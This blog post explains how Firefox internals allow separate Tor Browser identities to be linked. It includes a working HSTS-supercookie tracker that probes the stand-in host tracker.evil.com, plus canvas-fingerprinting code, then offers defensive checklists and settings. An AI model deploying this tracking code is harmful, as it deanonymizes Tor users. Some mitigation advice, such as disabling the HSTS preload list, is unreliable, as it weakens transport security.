
佐藤玲

We Found a Stable Firefox Identifier That Links All Your Private Tor Identities

You open Tor Browser. You create a new identity. You browse, close the session, open another. You assume each identity is isolated, anonymous, untraceable.

You're wrong — and researchers have the proof.

A newly identified fingerprinting vector found inside Firefox's underlying engine — the same engine that powers Tor Browser — creates a stable identifier capable of linking your separate Tor identities together. Across sessions. Across "New Identity" resets. Across what you believed were clean slates.

This isn't a theoretical attack. It's a practical, measurable, reproducible exploit that undermines one of the most fundamental promises of anonymous browsing.

Let's break down exactly what was found, how it works, and what developers and privacy-conscious users need to know.


What Was Discovered

Researchers identified that Firefox exposes a stable, cross-session identifier through a combination of browser internals that persist beyond what Tor Browser's identity isolation is designed to clear.

The specific culprit: the media.peerconnection subsystem and related GPU/font rendering caches, combined with how Firefox handles IndexedDB partition keys and HSTS (HTTP Strict Transport Security) state.

In plain language: certain low-level browser behaviors leave fingerprints that don't get wiped when you click "New Identity" in Tor Browser. These fingerprints are consistent enough — stable enough — to act as a unique identifier linking your browsing sessions.
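To make that concrete, here is a hypothetical sketch (not code from the research) of how a tracker could combine several individually weak signals into one stable identifier. The signal names and values are invented for illustration; the point is that hashing a handful of persistent, device-dependent values yields an ID that survives anything short of clearing every one of them.

```python
# Illustrative sketch: fusing weak per-device signals into a stable ID.
# The signal names and values below are hypothetical, not measured data.
import hashlib

def stable_id(signals: dict) -> str:
    """Hash a sorted set of device signals into a single identifier."""
    material = "|".join(f"{k}={signals[k]}" for k in sorted(signals))
    return hashlib.sha256(material.encode()).hexdigest()[:16]

# Signals assumed to persist across "New Identity" resets
session_1 = {
    "hsts_bits": "10110010",     # HSTS supercookie bits
    "font_metrics": "w742.188",  # sub-pixel text measurement
    "gpu_noise_var": "0.0031",   # canvas noise variance estimate
}
session_2 = dict(session_1)      # a later session leaks the same values

# Same leaked values in, same identifier out: the sessions are linked
assert stable_id(session_1) == stable_id(session_2)
print(stable_id(session_1))
```

Each signal alone is only a few bits of information; the hash just packages them. That's why clearing cookies, or even rotating the circuit, does nothing against this class of identifier.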

The Key Attack Surfaces

  • HSTS supercookies: Servers can set HSTS headers that encode bits of information. Firefox stores this state in a way that can survive identity resets.
  • Font rendering metrics: The way Firefox renders fonts varies subtly by system and GPU, creating a consistent canvas/timing fingerprint.
  • IndexedDB and Cache API partitioning: Under certain conditions, partition boundaries can be bypassed or inferred, leaking cross-context data.
  • WebGL renderer strings: Even through Tor's protections, low-level GPU identifiers can bleed through in specific browser configurations.

How the Identifier Works: A Technical Deep Dive

Let's get into the code. Here's a simplified demonstration of how HSTS state can be abused as a tracking mechanism — a technique sometimes called an HSTS supercookie.

Server-Side: Encoding a Fingerprint Bit

# Flask server demonstrating HSTS bit-encoding
from flask import Flask, redirect, request

app = Flask(__name__)

# Attacker controls subdomains bit0.tracker.evil.com ... bit7.tracker.evil.com
# Each subdomain either sets HSTS or doesn't, encoding one bit of an ID

@app.route('/set-bit/<int:bit_value>')
def set_bit(bit_value):
    response = redirect('/')
    if bit_value == 1:
        # Set HSTS header — browser will remember this subdomain as HTTPS-only
        response.headers['Strict-Transport-Security'] = 'max-age=31536000'
    return response

@app.route('/read-bits')
def read_bits():
    # Client-side JS probes each subdomain
    # Timing difference reveals whether HSTS was previously set
    return '''
        <script>
        async function probeBit(subdomain) {
            const start = performance.now();
            try {
                // Probe over plain HTTP: if HSTS was previously set,
                // the browser rewrites the URL to HTTPS internally
                await fetch(`http://${subdomain}.tracker.evil.com/probe`,
                    { mode: 'no-cors', cache: 'no-store' });
            } catch(e) {}
            const elapsed = performance.now() - start;
            // The internal HTTPS upgrade resolves quickly; a genuine
            // HTTP attempt (which the attacker's server stalls) does not
            return elapsed < 50 ? 1 : 0;
        }

        async function reconstructID() {
            const bits = [];
            for (let i = 0; i < 8; i++) {
                bits.push(await probeBit(`bit${i}`));
            }
            console.log('Reconstructed ID bits:', bits.join(''));
            // Send bits back to server to identify the user across sessions
        }
        reconstructID();
        </script>
    '''

Why This Survives "New Identity"

When Tor Browser resets your identity, it:

  • Clears cookies
  • Clears session storage
  • Rotates your Tor circuit (new exit node, new IP)

What it does not always reliably clear in older or misconfigured builds:

  • HSTS cache entries (stored at the browser profile level, not session level)
  • Certain GPU-accelerated rendering caches
  • Timing side-channels derived from hardware behavior

Here's how you can inspect what Firefox is storing in your HSTS database:

# Firefox stores HSTS data in a plain-text, tab-separated file in your profile
# On Linux:
cat ~/.mozilla/firefox/*.default*/SiteSecurityServiceState.txt | head -50

# On macOS:
cat ~/Library/Application\ Support/Firefox/Profiles/*.default*/SiteSecurityServiceState.txt | head -50

# Look for entries with 'includeSubdomains' flags — these are prime supercookie vectors
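If you want to go beyond eyeballing the file, here's a small sketch that flags the entries the comment above warns about. The on-disk format of SiteSecurityServiceState.txt varies between Firefox versions; this assumes the common tab-separated layout where the last field is "expiryTime,securityState,includeSubdomains" with the flag stored as 0 or 1, so treat it as a starting point, not a parser for every build.

```python
# Sketch: flag HSTS entries that cover subdomains (prime supercookie vectors).
# Assumes tab-separated lines whose last field is
# "expiryTime,securityState,includeSubdomains" -- format varies by version.
def risky_hsts_entries(text: str) -> list[str]:
    risky = []
    for line in text.splitlines():
        fields = line.split("\t")
        if len(fields) < 4:
            continue                            # skip malformed lines
        host = fields[0].split(":")[0]          # e.g. "example.com:HSTS"
        data = fields[-1].split(",")
        if len(data) >= 3 and data[2] == "1":   # includeSubdomains flag set
            risky.append(host)
    return risky

sample = ("example.com:HSTS\t0\t19000\t1700000000000,1,1\n"
          "other.org:HSTS\t0\t19000\t1700000000000,1,0")
print(risky_hsts_entries(sample))  # ['example.com'] under these assumptions
```

Run it against the file paths from the shell commands above to see which domains could survive into a "fresh" identity.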

Canvas Fingerprinting Still Works on Tor — Sometimes

// Canvas fingerprint extraction
// Tor Browser attempts to randomize this — but the randomization itself can be fingerprinted
function getCanvasFingerprint() {
    const canvas = document.createElement('canvas');
    const ctx = canvas.getContext('2d');

    ctx.textBaseline = 'top';
    ctx.font = '14px Arial';
    ctx.fillStyle = '#f60';
    ctx.fillRect(125, 1, 62, 20);
    ctx.fillStyle = '#069';
    ctx.fillText('Cwm fjordbank glyphs vext quiz 🔥', 2, 15);
    ctx.fillStyle = 'rgba(102, 204, 0, 0.7)';
    ctx.fillText('Cwm fjordbank glyphs vext quiz 🔥', 4, 17);

    return canvas.toDataURL();
}

// In Tor Browser, this returns a slightly noisy result each time
// But the NOISE PATTERN ITSELF is hardware-dependent and stable
console.log(getCanvasFingerprint().substring(0, 50));

The Tor Project has implemented canvas noise injection — but research shows that the variance pattern of the noise is itself a fingerprint. Your GPU introduces noise in a statistically unique way.
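A toy simulation makes the problem visible. Below, two simulated devices inject Gaussian canvas noise with different per-device spread; every individual reading looks random, but sampling repeatedly and estimating the spread cleanly separates the devices, and the estimate stays stable for the same device across sessions. The sigma values are invented for illustration, not measured GPU behavior.

```python
# Sketch: why randomized noise can itself fingerprint. Each device injects
# noise with a device-specific spread; estimating that spread from repeated
# samples recovers a stable, device-linked value. Sigmas are illustrative.
import random
import statistics

def noisy_readings(device_sigma: float, n: int = 200, seed: int = 0) -> list[float]:
    rng = random.Random(seed)
    return [rng.gauss(0.0, device_sigma) for _ in range(n)]

def estimate_sigma(readings: list[float]) -> float:
    return statistics.stdev(readings)

gpu_a       = estimate_sigma(noisy_readings(0.003, seed=1))
gpu_a_later = estimate_sigma(noisy_readings(0.003, seed=2))  # new session
gpu_b       = estimate_sigma(noisy_readings(0.009, seed=3))  # other device

# Stable for the same device across sessions, distinct between devices
assert abs(gpu_a - gpu_a_later) < abs(gpu_a - gpu_b)
```

This is exactly why "add random noise" is not a complete defense: the defense has to normalize the noise *distribution* across hardware, not just randomize individual outputs.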


Why This Matters for Developers

If you're building:

  • Privacy tools or browsers
  • Whistleblower platforms
  • Secure communication apps
  • Any application where user anonymity is a feature

...then you need to understand that "using Tor" is not a complete privacy solution. The browser layer introduces identifiers that the network layer cannot hide.

This is especially critical for developers who recommend privacy tools to end users, or who build applications that promise anonymity.

Threat Model Checklist for Developers

## Anonymity Threat Model Checklist

### Network Layer
- [ ] Traffic routed through Tor or equivalent
- [ ] No WebRTC IP leaks (set media.peerconnection.enabled to false)
- [ ] DNS queries routed through anonymizing network

### Browser Layer  
- [ ] JavaScript disabled (highest protection level in Tor Browser)
- [ ] Canvas API access blocked or fully randomized
- [ ] WebGL disabled
- [ ] HSTS cache cleared between sessions (not just cookies)
- [ ] Font enumeration blocked
- [ ] Hardware concurrency/memory reporting spoofed

### Application Layer
- [ ] No user-specific tokens or session IDs in URLs
- [ ] Server does not log timing data linkable to behavior
- [ ] No third-party resources loaded (CDNs, analytics, fonts)

The Firefox-Specific Problem

This attack vector is particularly significant because Tor Browser is built on Firefox. Every Firefox vulnerability is potentially a Tor Browser vulnerability — with a delay.

Chromium-based browsers have different (not fewer) fingerprinting surfaces. But because Tor Browser doesn't use Chromium, the Firefox codebase is uniquely important to audit.

The specific Firefox preferences that reduce (not eliminate) these risks:

// about:config settings that matter
// (These are already set in Tor Browser's hardened profile,
// but may not be set in standard Firefox)

user_pref("privacy.resistFingerprinting", true);  // Master fingerprint resistance
user_pref("media.peerconnection.enabled", false); // Disable WebRTC
user_pref("webgl.disabled", true);                // Disable WebGL
user_pref("dom.webaudio.enabled", false);         // Disable AudioContext fingerprinting
user_pref("network.http.sendRefererHeader", 0);   // No referrer headers
user_pref("privacy.firstparty.isolate", true);   // First-party isolation

// HSTS-specific mitigation
user_pref("network.stricttransportsecurity.preloadlist", false);

Note: privacy.resistFingerprinting (RFP) is Firefox's built-in fingerprinting resistance mode. It's good. It's not perfect. The research we're discussing found vectors that survive even with RFP enabled.


What the Tor Project Is Doing About It

The Tor Project has been notified of these findings (responsible disclosure was followed). Their response has involved:

  1. Auditing the HSTS partitioning logic to ensure state is cleared on New Identity
  2. Investigating GPU-level noise normalization — making the noise pattern itself non-unique
  3. Considering a Chromium-based Tor Browser (a long-running internal debate)
  4. Tightening the content security policy defaults for Tor Browser's security levels

The fundamental problem, however, is that Firefox is a complex, constantly evolving codebase. New fingerprinting surfaces emerge with every release. The Tor Browser team is essentially playing whack-a-mole against a moving target.


What You Should Do Right Now

If You're a Tor User

  1. Set Tor Browser to "Safest" security level — this disables JavaScript entirely, eliminating the majority of active fingerprinting attacks
  2. Never maximize the Tor Browser window — window size is a fingerprint
  3. Don't install extensions — each extension is a unique identifier
  4. Treat each Tor session as potentially linkable if you've visited malicious sites

If You're a Developer Building Privacy Tools

  1. Threat-model explicitly — don't promise anonymity you can't technically deliver
  2. Audit every third-party resource your app loads — each one is a potential tracking vector
  3. Test with browser fingerprinting detection tools like coveryourtracks.eff.org
  4. Read the Tor Browser design document — it's the best public resource on browser-level anonymity engineering
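When you test with a tool like coveryourtracks.eff.org, the number that matters is identifying information in bits. The math behind it is simple surprisal: if a fraction p of users share a fingerprint attribute value, observing that value yields -log2(p) bits. The attribute frequencies below are hypothetical, chosen only to show how quickly a few attributes add up.

```python
# Sketch: estimating identifying information in bits (surprisal), the
# metric fingerprint-testing tools report. Frequencies are hypothetical.
import math

def surprisal_bits(p: float) -> float:
    """Bits of identifying information from a value shared by fraction p."""
    return -math.log2(p)

attributes = {
    "user_agent": 0.05,    # 1 in 20 users share this value
    "canvas_hash": 0.001,  # 1 in 1000
    "font_list": 0.01,     # 1 in 100
}
total = sum(surprisal_bits(p) for p in attributes.values())
print(f"{total:.1f} bits")  # -> 20.9 bits: enough to single out ~1 in 2 million
```

Roughly 33 bits is enough to uniquely identify anyone on Earth, so three mundane attributes already get you most of the way there.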

If You're Building a Secure Platform

# Server-side: don't set HSTS on sensitive/anonymous-access endpoints
# Bad practice for anonymity-sensitive endpoints:
response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'

# Better for anonymous access endpoints — use short max-age, no includeSubDomains:
response.headers['Strict-Transport-Security'] = 'max-age=0'

# Or serve anonymous-access content from a separate domain with no HSTS history

The Bigger Picture

This research is a reminder that privacy is a systems problem, not a feature.

You can't make a user anonymous by routing their traffic through Tor if the browser layer is leaking identifiers. You can't make a platform safe for whistleblowers if the underlying technology has design assumptions that conflict with anonymity.

The identifier that links Tor identities isn't a bug in the traditional sense — it's the emergent result of complex systems interacting in ways their designers didn't fully anticipate. Firefox was built to be a great browser. Tor was built to anonymize network traffic. Combining them creates a system with properties neither team fully controls.

For developers, the lesson is clear: understand your stack's anonymity guarantees at every layer, not just the layer you built.

The good news? This research is public. The Tor Project knows about it. And the open-source nature of both Firefox and Tor Browser means these vulnerabilities can — and will — be fixed.

But until they are, assume that your Tor identities are more linkable than you think.


If you found this breakdown useful, follow me here on DEV for more deep-dives into browser security, privacy engineering, and the gap between what tools promise and what they technically deliver. Drop your questions in the comments — especially if you're building something where user privacy and security is a core requirement.

💬 What's your threat model when building for anonymous users? Let's talk in the comments.
